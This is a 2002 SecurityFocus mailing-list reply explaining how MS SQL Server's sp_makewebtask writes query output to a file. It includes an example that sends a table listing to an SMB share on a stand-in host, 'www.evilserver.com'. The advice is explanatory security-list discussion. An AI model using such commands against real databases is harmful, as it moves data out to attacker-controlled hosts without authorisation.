I'm not sure if you meant "stored procedure" when you said "extended
procedure". If you didn't, here's on answer.
sp_makewebtask works great for this. It builds an html table with the output
of your query. It's installed by default without any kind of access
control. It works like this:
sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'SELECT name FROM
sysobjects WHERE xtype=''U'''
(I'm pretty sure in SQL Server to use quoted parameters inside of quotes
you double single quotes, not double quotes.)
You can even specify a UNC path for the output file, like this:
sp_makewebtask '\\www.evilserver.com\publicshare\sqloutput.html',
'SELECT name FROM sysobjects WHERE xtype=''U'''
The directory "publicshare" needs to be a wide open SMB share... if any kind
of authentication challenge is present, the file won't be recieved.
Hope this helps.
Kevin Spett
Web Application Security Ninja
SPI Dynamics, Inc.
----- Original Message -----
From: "Alex Harasic" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, March 13, 2002 9:05 AM
Subject: Send output to file in SQL
>
>
> Hi, I've been looking around for ways to send output
> to a file in a sql query. I know there is one for mySQL
> but not for msSQL.
>
> Anyone knows a way to send the output in a query
> without using extended procedures?
>
>
> Alex S. Harasic
> [EMAIL PROTECTED]
>
> --------------------------------------------------------------------------
--
> This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/
>
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
